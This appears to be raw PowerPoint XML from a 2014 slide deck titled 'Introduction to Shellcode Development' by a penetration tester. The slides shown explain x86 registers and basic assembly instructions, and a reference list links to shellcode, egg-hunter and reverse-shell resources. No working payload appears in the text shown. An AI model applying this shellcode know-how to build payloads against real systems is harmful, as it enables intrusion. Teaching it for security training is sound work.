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4"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="289" r:id="rId9"/>
    <p:sldId id="290" r:id="rId10"/>
    <p:sldId id="291" r:id="rId11"/>
    <p:sldId id="292" r:id="rId12"/>
    <p:sldId id="295" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="294" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="263" r:id="rId17"/>
    <p:sldId id="264" r:id="rId18"/>
    <p:sldId id="266" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="277" r:id="rId27"/>
    <p:sldId id="278" r:id="rId28"/>
    <p:sldId id="279" r:id="rId29"/>
    <p:sldId id="267" r:id="rId30"/>
    <p:sldId id="268" r:id="rId31"/>
    <p:sldId id="269" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="270" r:id="rId34"/>
    <p:sldId id="280" r:id="rId35"/>
    <p:sldId id="281" r:id="rId36"/>
    <p:sldId id="282" r:id="rId37"/>
    <p:sldId id="283" r:id="rId38"/>
    <p:sldId id="284" r:id="rId39"/>
    <p:sldId id="285" r:id="rId40"/>
    <p:sldId id="286" r:id="rId41"/>
    <p:sldId id="288" r:id="rId42"/>
    <p:sldId id="28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168D0-38DC-4BBF-AF49-2DDD301E909D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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3615EF-822B-4C3F-9A37-7D91FEB4767F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3313960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3615EF-822B-4C3F-9A37-7D91FEB4767F}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA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66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA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66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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F66F77A-9BD6-47B7-A6D6-D72BB923ECDF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/2/2014</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F35F71D-983F-4306-A541-C5FBEE38CA2D}"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code.google.com/p/beta3/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/idfaq/polymorphic_shell.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/connect/articles/windows-syscall-shellcode" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/shellcode/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sandsprite.com/shellcode_2_exe.php" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://skypher.com/wiki/index.php?title=Hacking/Shellcode/Egg_hunt/w32_SEH_omelet_shellcode" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/reyammer/shellnoob" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blackhatlibrary.net/Shellcode/Alphanumeric" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.markloiseau.com/2012/06/64-bit-linux-shellcode/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/61/11.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/papers/15652/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thegreycorner.com/2013/10/omlette-egghunter-shellcode.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://skypher.com/wiki/index.php?title=Www.edup.tudelft.nl/~bjwever/whitepaper_shellcode.html.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mcdermottcybersecurity.com/articles/windows-x64-shellcode" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blackhatlibrary.net/Shellcode/Socket-reuse" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://morgawr.github.io/hacking/2014/03/29/shellcode-to-reverse-bind-with-netca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2935069"/>
            <a:ext cx="3429000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Ionut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>Popescu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886200"/>
            <a:ext cx="6705600" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Penetration Tester @ KPMG Romania</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.kpmg.com/ro/en/Pages/default.aspx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5021759"/>
            <a:ext cx="6705600" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Administrator @ Romanian Security Team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.rstforums.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="704671"/>
            <a:ext cx="6019800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Introduction to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Shellcode Development</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344269"/>
            <a:ext cx="52578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Pointer &amp; Index registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214021"/>
            <a:ext cx="8382000" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pointer Registers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The pointer registers are 32-bit EIP, ESP and EBP registers and corresponding 16-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>right </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>portions. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP, SP and BP. There are three categories of pointer registers: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instruction Pointer (IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- the 16-bit IP register stores the offset address of the next instruction to be executed. IP in association with the CS register (as CS:IP) gives the complete address of the current instruction in the code segment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack Pointer (SP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- the 16-bit SP register provides the offset value within the program stack. SP in association with the SS register (SS:SP) refers to be current position of data or address within the program stack. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Base Pointer (BP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- the 16-bit BP register mainly helps in referencing the parameter variables passed to a subroutine. The address in SS register is combined with the offset in BP to get the location of the parameter. BP can also be combined with DI and SI as base register for special addressing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Index Registers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The 32-bit index registers ESI and EDI and their 16-bit rightmost portions SI and DI are used for indexed addressing and sometimes used in addition and subtraction. There are two sets of index pointers: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source Index (SI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- it is used as source index for string operations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Destination Index (DI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- it is used as destination index for string operations. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369582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68069"/>
            <a:ext cx="52578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Processor instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="8610600" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>src ; The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>data specified by src is copied to dest. One restriction is that both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>operands may not be memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>operands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 into EAX register (3 is immediate operand)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>mov bx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>ax </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the value of AX into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>The ADD instruction is used to add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>integers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>add eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax = eax + 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>add al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>ah     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; al = al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>The SUB instruction subtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>integers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>sub bx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bx = bx - 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>sub ebx, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>The INC and DEC instructions increment or decrement values by one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Since the one is an implicit operand, the machine code for INC and DEC is</a:t>
            </a:r>
